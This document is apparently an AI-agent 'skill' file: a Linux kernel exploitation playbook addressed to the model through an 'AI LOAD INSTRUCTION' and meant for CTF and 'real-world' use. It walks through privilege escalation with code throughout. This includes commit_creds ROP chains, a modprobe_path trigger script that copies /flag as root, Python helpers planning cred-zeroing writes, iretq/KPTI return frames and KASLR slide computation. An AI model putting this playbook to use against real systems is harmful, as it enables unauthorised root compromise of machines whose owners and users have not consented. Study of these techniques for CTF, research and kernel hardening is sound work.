---
name: kernel-exploitation
description: >-
  Linux kernel exploitation playbook. Use when exploiting kernel vulnerabilities (UAF, OOB, race condition, type confusion) for privilege escalation via commit_creds, modprobe_path overwrite, or kernel ROP chains in CTF and real-world scenarios.
---

# SKILL: Linux Kernel Exploitation - Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI.

## 0. RELATED ROUTING

- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) - userspace protections (NX, ASLR) have kernel-side counterparts
- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) - kernel ROP reuses many userspace ROP concepts
- [heap-exploitation](../heap-exploitation/SKILL.md) - kernel SLUB is conceptually related to the userspace heap
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) - non-exploit kernel privesc techniques

### Advanced References

- [KERNEL_MITIGATION_BYPASS.md](./KERNEL_MITIGATION_BYPASS.md) - KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques
- [KERNEL_HEAP_TECHNIQUES.md](./KERNEL_HEAP_TECHNIQUES.md) - SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation

---

## 1. EXPLOITATION MODEL

```
┌───────────────────────────────────────────────────────┐
│  1. Find Vulnerability                                │
│     (UAF, OOB, race, integer overflow, type confusion)│
├───────────────────────────────────────────────────────┤
│  2. Build Primitive                                   │
│     (arbitrary read, arbitrary write, controlled RIP) │
├───────────────────────────────────────────────────────┤
│  3. Bypass Mitigations                                │
│     (KASLR, SMEP, SMAP, KPTI)                         │
├───────────────────────────────────────────────────────┤
│  4. Escalate Privileges                               │
│     (commit_creds, modprobe_path, namespace escape)   │
├───────────────────────────────────────────────────────┤
│  5. Return to Userspace Cleanly                       │
│     (KPTI trampoline, iretq/sysretq, swapgs)          │
└───────────────────────────────────────────────────────┘
```

---

## 2. ENVIRONMENT SETUP

### QEMU + Custom Kernel

```bash
# Download and compile kernel
wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz
tar xf linux-6.1.tar.xz && cd linux-6.1
make defconfig

# Disable mitigations for easier debugging:
scripts/config --disable RANDOMIZE_BASE   # KASLR
# FG-KASLR is an out-of-tree patch set; mainline 6.1 has no option to disable.
# Since 5.18 DEBUG_INFO is selected through the debug-info choice:
scripts/config --disable DEBUG_INFO_NONE --enable DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
make olddefconfig                         # resolve dependencies of the edits
make -j$(nproc)

# Boot with QEMU
# -s -S: GDB server on :1234, pause at start
# (a comment after a trailing backslash would break the line continuation)
qemu-system-x86_64 \
    -kernel arch/x86/boot/bzImage \
    -initrd rootfs.cpio.gz \
    -append "console=ttyS0 nokaslr quiet" \
    -nographic \
    -s -S \
    -monitor /dev/null \
    -m 256M \
    -cpu kvm64,+smep,+smap
```

### GDB Debugging

```bash
gdb vmlinux
# The remaining lines are typed at the (gdb) prompt:
target remote :1234

# Symbols already come from vmlinux when the guest boots with nokaslr.
# Only if the kernel was relocated, reload them at the runtime .text base:
add-symbol-file vmlinux 0xffffffff81000000  # typical non-KASLR .text base

# Breakpoints
b commit_creds
b *0xffffffff81234567

# pwndbg/GEF work with kernel debugging
```

### initramfs Modification

```bash
mkdir rootfs && cd rootfs
# The archive is gzip-compressed, so decompress before handing it to cpio
zcat ../rootfs.cpio.gz | cpio -idmv

# Edit init script, add exploit binary
cp /path/to/exploit ./

# Repack
find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz
```

---

## 3. COMMON VULNERABILITY TYPES

| Type | Description | Kernel Example |
|---|---|---|
| UAF | Object freed but pointer still accessible | CVE-2022-32250 (Netfilter nf_tables) |
| OOB Read/Write | Array index or size check missing | CVE-2021-22555 (Netfilter) |
| Race Condition | TOCTOU between check and use | CVE-2016-5195 (DirtyCow) |
| Integer Overflow | Size calculation wraps around | Various ioctl handlers |
| Type Confusion | Object cast to wrong type | CVE-2022-34918 (Netfilter nf_tables) |
| Double Free | Object freed twice | CVE-2017-6074 (DCCP) |
| Stack Overflow | Kernel stack buffer overflow | Rare (kernel stack is small: 8KB–16KB) |

Note that CVE-2022-0847 (DirtyPipe) is an uninitialized `pipe_buffer.flags` bug, not a UAF.

---

## 4. PRIVILEGE ESCALATION TARGETS

### Method 1: commit_creds(prepare_kernel_cred(0))

```c
// Kernel functions that build a root cred and install it on the current task.
// COMMIT_CREDS_ADDR and PREPARE_KERNEL_CRED_ADDR are placeholders for
// addresses resolved on the target kernel.
int (*commit_creds)(void *) = (void *)COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = (void *)PREPARE_KERNEL_CRED_ADDR;

commit_creds(prepare_kernel_cred(0));  // new cred copied from init_cred: uid=0, gid=0
```

From kernel 6.2 onward, `prepare_kernel_cred(NULL)` no longer falls back to `init_cred`; on those kernels pass the address of `init_cred` to `commit_creds` instead.

Kernel ROP chain equivalent:

```
pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) returns a copy of init_cred
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace
```

### Method 2: modprobe_path Overwrite

```c
// modprobe_path = "/sbin/modprobe" in kernel .data
// Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root
```

```bash
# Setup:
echo '#!/bin/sh' > /tmp/x
echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x
chmod +x /tmp/x

# Trigger (unknown binary format):
echo -ne '\xff\xff\xff\xff' > /tmp/dummy
chmod +x /tmp/dummy
/tmp/dummy   # kernel calls modprobe_path → /tmp/x runs as root
```

The overwrite needs the runtime address of `modprobe_path`, so a KASLR bypass is still required. Some newer kernels no longer request a module from the unknown-binary-format path, in which case this particular trigger does not fire.

### Method 3: cred Structure Direct Overwrite

If you have arbitrary write and can locate the current task's `cred` structure (for example by following `task_struct->cred` with an arbitrary read), zero the ID fields (`uid`, `gid`, `suid`, `sgid`, `euid`, `egid`, `fsuid`, `fsgid`) in place.
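
The overwrite in Method 3 amounts to a short list of small writes. The sketch below, in Python for readability, only plans those writes for a hypothetical arbitrary-write primitive. The field order and the 4-byte offset of the first ID are assumptions that match a `struct cred` whose leading `usage` counter is a 4-byte `atomic_t`; offsets differ across kernel versions and configs, so confirm them against the target's debug info. `cred_zero_writes` and the example address are illustrative names, not kernel APIs.

```python
import struct

# ASSUMPTION: layout where a 4-byte `usage` counter is followed directly by
# eight 32-bit IDs. Verify on the target build before relying on it.
CRED_ID_FIELDS = ["uid", "gid", "suid", "sgid", "euid", "egid", "fsuid", "fsgid"]
CRED_FIRST_ID_OFFSET = 4
ID_SIZE = 4


def cred_zero_writes(cred_addr):
    """Return (field, address, payload) tuples that set every ID field to 0."""
    writes = []
    for index, name in enumerate(CRED_ID_FIELDS):
        addr = cred_addr + CRED_FIRST_ID_OFFSET + index * ID_SIZE
        writes.append((name, addr, struct.pack("<I", 0)))
    return writes


# Hypothetical cred address, as it might come from an arbitrary read.
EXAMPLE_CRED = 0xFFFF888003A1C000
for field, addr, payload in cred_zero_writes(EXAMPLE_CRED):
    print(f"{field:6s} @ {addr:#x} <- {payload.hex()}")
```

Each tuple would be handed to whatever write primitive the bug provides. Planning the writes separately from performing them makes it easy to check the offsets in a debugger first.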

### Method 4: Namespace Escape (Containers)

Repoint the task's namespace pointers at the host's: for example, set the task's `nsproxy` to `init_nsproxy` (the kernel helper `switch_task_namespaces` does this) so the process leaves the container's namespaces.

---

## 5. KERNEL ROP

### Controlled RIP Sources

| Source | Mechanism |
|---|---|
| Corrupted function pointer | UAF object has vtable-like dispatch → overwrite pointer |
| Corrupted return address | Kernel stack overflow (rare) |
| Corrupted `ops` structure | Module operations struct (file_operations, seq_operations) |

### seq_operations Hijack (Common CTF Pattern)

```c
struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void   (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int    (*show)(struct seq_file *, void *);
};
// Size: 0x20 (fits in kmalloc-32; kmalloc-cg-32 on kernels with separate
// accounted caches, since the allocation uses GFP_KERNEL_ACCOUNT)
// Open /proc/self/stat → allocates seq_operations
// UAF overwrite start → controlled RIP when read() is called
```

### Stack Pivoting in Kernel

| Gadget | Usage |
|---|---|
| `xchg eax, esp; ret` | Pivot to the address in the lower 32 bits of RAX (mmap a buffer at that address; the fake stack is in user memory, so this needs SMAP off) |
| `mov rsp, [rdi+X]; ...` | If RDI points to controlled data |
| `push rdi; pop rsp; ...` | Pivot to RDI (first arg of hijacked function) |

**Important**: With SMEP enabled, the kernel cannot execute userspace code. The ROP chain must use **kernel gadgets** only.

---

## 6. ret2usr (Pre-SMEP)

Directly call a userspace function from kernel context:

```c
// commit_creds and prepare_kernel_cred are function pointers set to the
// kernel addresses of those symbols.
void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory
```

**Blocked by**: SMEP (Supervisor Mode Execution Prevention), which stops the kernel from executing user-mapped pages. KPTI has the same effect, because user pages are mapped non-executable in the kernel page tables.

---

## 7. RETURNING TO USERSPACE

After escalating privileges in the kernel, the exploit must return cleanly to userspace to get a root shell.
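
A clean return ultimately means handing the CPU a complete user-mode frame. As a minimal sketch (Python, with hypothetical helper names and example values), the five 64-bit words that `iretq` consumes can be laid out and packed as below. The selector values assume a standard x86_64 Linux userspace; RIP, RFLAGS, and RSP must come from state the exploit saved before entering the kernel.

```python
import struct

USER_CS = 0x33  # 64-bit user code segment selector on x86_64 Linux
USER_SS = 0x2B  # user stack segment selector on x86_64 Linux


def iretq_frame(user_rip, user_rflags, user_rsp, user_cs=USER_CS, user_ss=USER_SS):
    """Return the five qwords in the order iretq pops them."""
    return [user_rip, user_cs, user_rflags, user_rsp, user_ss]


def pack_qwords(values):
    """Serialize a list of integers as little-endian 64-bit words."""
    return b"".join(struct.pack("<Q", value) for value in values)


# Example values only: a hypothetical get_shell address, a typical saved
# RFLAGS value, and a hypothetical saved user stack pointer.
frame = iretq_frame(user_rip=0x401234, user_rflags=0x246, user_rsp=0x7FFD00001000)
payload_tail = pack_qwords(frame)
print(payload_tail.hex())
```

The packed bytes form the tail of a ROP payload, placed directly after the gadget that executes `iretq` (or after the trampoline address when KPTI is enabled).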

### Via iretq (Traditional)

```nasm
; ROP chain ending:
swapgs          ; swap GS base back to userspace
iretq           ; pops: RIP, CS, RFLAGS, RSP, SS from stack

; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]
```

```python
# Userspace state to save before entering the kernel (x86_64 values)
user_cs = 0x33       # 64-bit user code segment selector
user_ss = 0x2b       # user stack segment selector
user_rflags = None   # fill in: value saved via pushfq before the exploit
user_rsp = None      # fill in: saved user RSP
user_rip = None      # fill in: address of post-exploit function (e.g., get_shell)
```

### Via KPTI Trampoline (When KPTI Enabled)

KPTI separates kernel and user page tables. A direct `swapgs; iretq` crashes because CR3 still points at the kernel page tables, in which user pages are not executable. Use the kernel's own return trampoline, which switches CR3 before returning:

```
# KPTI trampoline (in kernel at known offset):
# swapgs_restore_regs_and_return_to_usermode:
#   mov rdi, rsp
#   ...            (switches to the user page tables)
#   swapgs
#   iretq

# Jump to trampoline with [RIP, CS, RFLAGS, RSP, SS] on stack
```

Chains usually enter the trampoline past its initial register pops. The exact entry offset and the number of padding words it then consumes before the frame depend on the kernel build, so check the disassembly.

### Via Signal Handler Return

Set up a signal handler before the exploit. After `commit_creds`, trigger the signal so that the return to userspace goes through the handler. A common variant registers a SIGSEGV handler: if a plain `swapgs; iretq` faults on the first user instruction under KPTI, the kernel delivers SIGSEGV through its normal return path and the handler runs with the new credentials, which avoids using the trampoline.

---

## 8. QEMU DEBUGGING TIPS

| Command | Purpose |
|---|---|
| `-s -S` | GDB server on :1234, paused |
| `-monitor /dev/null` | Disable QEMU monitor (cleaner output) |
| `-append "nokaslr"` | Disable KASLR for debugging |
| `-cpu kvm64,+smep,+smap` | Enable specific CPU features |
| `info registers` (GDB) | Show all register values |
| `maintenance packet Qqemu.PhyMemMode:1` | Read physical memory in GDB |
| `cat /proc/kallsyms` | Kernel symbol addresses (if readable) |
| `cat /sys/kernel/notes` | Kernel build ID |

---

## 9. DECISION TREE

```
Kernel vulnerability identified
├── What type?
│   ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES)
│   ├── OOB → determine read/write range, target adjacent objects
│   ├── Race condition → reliable trigger (userfaultfd, FUSE)
│   ├── Integer overflow → how does it translate to OOB or allocation confusion?
│   └── Type confusion → what can the confused type access?
│
├── Build primitive
│   ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP)
│   ├── Arbitrary read? → leak KASLR base, then controlled RIP
│   ├── Arbitrary write? → modprobe_path overwrite (simplest)
│   │                      or overwrite cred structure directly
│   └── Limited write? → target function pointer in known object
│
├── Mitigations (see KERNEL_MITIGATION_BYPASS.md)
│   ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read)
│   ├── SMEP → kernel ROP only (no user code exec)
│   ├── SMAP → kernel cannot access user pages directly (keep ROP stack and fake
│   │          objects in kernel memory, or use a copy_from_user gadget)
│   ├── KPTI → use KPTI trampoline for clean return
│   └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path)
│
├── Escalation method
│   ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds
│   ├── Have arbitrary write + KASLR bypass → modprobe_path overwrite
│   ├── Have arbitrary read + write → locate current cred, overwrite uid/gid to 0
│   └── Have controlled function call → call commit_creds(prepare_kernel_cred(0))
│
└── Return to userspace
    ├── KPTI disabled → swapgs; iretq (ROP ending)
    ├── KPTI enabled → jump to KPTI trampoline
    └── Alternative → signal handler + process_one_work return path
```
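
The KASLR branch of the tree reduces to one subtraction once a single kernel text address has leaked. The following Python sketch parses `/proc/kallsyms`-style text from a reference (non-randomized) kernel, derives the slide from one leaked runtime address, and rebases the remaining symbols. The sample addresses are made up for illustration, the helper names are hypothetical, and the 2 MiB alignment check assumes the default x86_64 text alignment. The approach does not apply as-is under FG-KASLR, where per-function offsets change.

```python
# Made-up reference addresses in /proc/kallsyms format: "<hex addr> <type> <name>"
SAMPLE_KALLSYMS = """\
ffffffff810a1234 T commit_creds
ffffffff810a1500 T prepare_kernel_cred
ffffffff82a4b2c0 D modprobe_path
"""

TEXT_ALIGN = 0x200000  # ASSUMPTION: default 2 MiB kernel alignment on x86_64


def parse_kallsyms(text):
    """Map symbol name to address, keeping the first occurrence of each name."""
    symbols = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        symbols.setdefault(parts[2], int(parts[0], 16))
    return symbols


def kaslr_slide(leaked_addr, static_addr):
    """Return the runtime slide, rejecting values that cannot be a valid slide."""
    slide = leaked_addr - static_addr
    if slide < 0 or slide % TEXT_ALIGN != 0:
        raise ValueError(f"implausible KASLR slide: {slide:#x}")
    return slide


def rebase(symbols, slide):
    """Apply the slide to every reference address."""
    return {name: addr + slide for name, addr in symbols.items()}


static = parse_kallsyms(SAMPLE_KALLSYMS)
leaked_commit_creds = 0xFFFFFFFF82CA1234  # hypothetical leaked runtime pointer
slide = kaslr_slide(leaked_commit_creds, static["commit_creds"])
runtime = rebase(static, slide)
print(f"slide = {slide:#x}, modprobe_path = {runtime['modprobe_path']:#x}")
```

Rejecting a misaligned slide early is a cheap sanity check: a leak that is not actually a pointer to the expected symbol usually fails it.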